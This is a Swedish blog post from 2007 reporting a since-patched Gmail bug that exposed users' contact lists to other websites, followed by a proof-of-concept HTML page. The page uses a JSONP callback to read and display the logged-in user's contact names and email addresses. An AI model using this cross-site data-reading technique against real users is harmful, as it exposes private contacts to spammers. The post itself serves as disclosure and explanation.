Beta Alfa

Det har uppdagats en lite läskig säkerhetsbugg i Gmail. Om du har loggat in på Gmail via din webbläsare ligger dina mejladresser öppna och tillgängliga.

“Använder du Gmail är risken stor för att din personliga kontaktbok kan kommas åt av sajter som skickar skräppost.”

Till dess att Google har fixat buggen är det säkrast att logga ut från Gmail.

Mikrodatorn: Bugg i Gmail hjälper spammare

Överkurs:

Den som är intresserad av webbteknik och vill pröva själv… Logga in på Gmail, placera sedan nedanstående kod i ett html-dokument vilket du därefter öppnar i webbläsaren.

<html><head>
<title>Dina mejladresser</title>
<style type="text/css">
body {margin:50px;font-size:105%;font-family:sans-serif;}
</style>
<script>
function test(a){
  var x="";
  if (a.Body.Contacts.length>0) {
    for(i=1;i<a.Body.Contacts.length;i++) {
      x += a.Body.Contacts[i].Name
      + ": " + a.Body.Contacts[i].Email
      + "<br />";
    }
    document.write("<h3>Dina mejladresser</h3>"+x);
  }
}
</script>
<script src="http://docs.google.com/data/contacts?out=js&callback=test">
</script>
</head>
<body> </body></html>


Jag har testat skriptet i Firefox. Inga garantier eller support ges.

Andra bloggar om: gmail, säkerhet.

Uppdaterat

SäkerhetCentret: Gmail avslöjar kontaktlista

Uppdaterat igen

Nu tycks Google har lagat läckan. Ett snabbt test med mitt skript gav inga adresser.

Om du vill kan du Pusha detta inlägg!

This entry was posted on Monday, January 1st, 2007 at 19:46 and is filed under Blandat. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.